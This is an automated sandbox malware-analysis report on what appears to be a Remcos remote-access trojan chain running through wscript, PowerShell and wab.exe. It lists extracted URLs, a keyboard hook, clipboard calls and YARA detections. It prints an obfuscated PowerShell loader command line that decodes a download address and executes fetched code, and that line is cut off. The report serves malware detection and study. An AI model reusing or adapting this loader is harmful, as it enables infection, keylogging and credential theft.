                Source: wscript.exe, 00000000.00000003.2091024269.00000222CB582000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090012949.00000222CB55B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087476305.00000222CD3A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?df83351815365
                Source: wscript.exe, 00000000.00000003.2091024269.00000222CB582000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090012949.00000222CB55B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?df83351815
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, bhvEF08.tmp.14.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpM
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpa
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpm
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gprv
                Source: powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvEF08.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
                Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.compData
                Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
                Source: wab.exe, 0000000E.00000002.2604949604.0000000002DA4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
                Source: wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2570518162.000002848DF0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wab.exe | String found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://www.digicert.com/CPS0
                Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: wab.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvEF08.tmp.14.dr | String found in binary or memory: https://www.office.com/

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW,14_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_004072B5

                E-Banking Fraud

                Source: Yara match | File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_5512.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9716
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 9716
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00401806 NtdllDefWindowProc_W,14_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004018C0 NtdllDefWindowProc_W,14_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346FB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F4A0A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346FBEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F44E0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F3E33
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F16C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F6E6D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F7AFA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346F6BF3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD347C088D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04EAF1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04EAFAC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04EAEEA8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21377194
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136B5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 15_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 16_2_00401689
